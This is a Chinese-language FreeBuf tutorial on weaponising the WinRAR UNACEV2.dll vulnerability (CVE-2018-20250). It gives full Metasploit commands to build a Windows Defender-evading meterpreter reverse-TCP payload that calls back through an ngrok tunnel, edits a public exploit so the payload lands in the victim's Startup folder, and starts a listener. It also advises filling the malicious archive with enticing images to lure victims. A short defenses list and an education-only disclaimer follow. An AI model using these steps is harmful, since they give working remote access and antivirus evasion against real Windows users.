WinRAR遠端程式碼執行漏洞結合Metasploit+Ngrok實現遠端上線
*本文作者:艾登——皮爾斯,本文屬 FreeBuf 原創獎勵計劃,未經許可禁止轉載。
前言
Windows 作業系統下知名老牌的的壓縮軟體“WinRAR” 被國外安全研究團隊爆出嚴重威脅使用者的安全漏洞,被發現漏洞是“WinRAR”安裝目錄中的一個名為“UNACEV2.dll”的動態連結庫檔案,該檔案自 2005 年釋出至今就從未有過更新過,影響時長長達十餘年之久。本篇文章鄙人會使用圖文+視訊的教程來給各位不知道利用的小粉們講一下,視訊教程在文末尾處。
漏洞細節: https://research.checkpoint.com/extracting-code-execution-from-winrar/
影響版本
WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好壓(2345壓縮) < = 5.9.8.10907 360壓縮< = 4.0.0.1170
準備
KaliLinux(版本隨意我這裡使用的版本是2019.1版本) ngrok Metasploit(KaliLinux2019.1已經集成了Metasploit5)
圖文教程開始
1.1 下載WinRAR遠端程式碼執行漏洞EXP利用檔案:
https://github.com/WyAtu/CVE-2018-20250.git
1.2 開啟你的瀏覽器開啟 https://www.ngrok.cc/ 有賬號登入,沒有賬戶註冊登入。開通一個免費的隧道轉發代理,把ngrok隧道協議設定成TCP,內網IP改成你自己的KaliLinux的內網IP,內網埠號任意填寫不衝突即可。
1.3 記住如圖所示紅線框起來的兩部分內容,後面會用到。
1.4 然後 下載ngrok指令碼到你的KaliLinux上面 ,選擇”Linux 64Bit版本”儲存到桌面上,執行指令碼開啟代理。
./sunny clientid [隧道ID]
Metasploit生成免殺Payload 載荷(針對Windows10的defender)
2.1 使用Metasploit5自帶的免殺模組生成Payload
msfconsole use evasion/windows/windows_defender_exe(選擇msf5免殺模組) show info(顯示模組資訊) set filename WinRarPayloadTest.exe(設定Payload名字 ) set payload windows/meterpreter/reverse_tcp(設定Payload型別 ) set lhost free.idcfengye.com(設定上線地址,填寫Ngrok映射出去的地址即可) set lport 12352(設定監聽埠,填寫Ngrok映射出去的埠即可 ) run(生成Payload)
(Payload的路徑地址:/root/.msf4/local/WinRarPayload.exe)
2.2 把Payload移動到apache2網站根目錄下
cp /root/.msf4/local/xxxxx.exe /var/www/htm
2.3 啟動阿帕奇服務
service apache2 start
2.4 物理機訪問KaliLinux的IP地址,下載這個Payload檔案到EXP資料夾下的根目錄。
2.5 開啟exp.py檔案把“calc.exe“修改成”WinRarPayload.exe”儲存。
2.6 Python執行exp.py檔案自動在檔案根目錄下生成惡意壓縮包。
2.7 已經成功生成了惡意的壓縮包,這時候你們往裡面丟一些照片視訊(你懂的)什麼的就變成了誘人的壓縮包了。
Windows7靶機下載解壓這個惡意壓縮包:
3.1 解壓後自動在系統啟動目錄下自動出現我們之前生成的Payload。
Windows7系統啟動目錄:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup。
Metasploit啟動遠端監聽主機上線請求:
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.0.107 set lport 8989 run
確保ngrok後臺在執行,然後重啟Windows7靶機,metasploit監聽等待上線。
視訊復現教程
https://www.lanzous.com/i3a0ide 密碼:FreeBuf
防禦方法
1. 解除安裝Winrar,下載7z,安裝包體積小,壓縮解壓速度快( 傳送門 )
2. 刪除UNACEV2.dll檔案
3. 不下載解壓來歷不明的壓縮包(色字頭上一把刀,手衝一時爽)
小結
evasion/windows/windows_defender_exe這個免殺模組基本可以免殺大多防毒軟體(Windows10 Defender,火絨等等),也可以通過Shllecode編碼的方式來達到免殺的效果,條條大路通羅馬。其次你也可以使用Windows平臺下的其他遠端RAT(Njrat,Ghost等等)來生成惡意的壓縮包,Windows平臺的內網穿透工具可以使用”網路通”,來達到效果。文章和視訊僅用於安全教育的範疇;切勿違法使用,視訊配BGM是鄙人喜好,望各位前輩多多包涵。
*本文作者:艾登——皮爾斯,本文屬 FreeBuf 原創獎勵計劃,未經許可禁止轉載。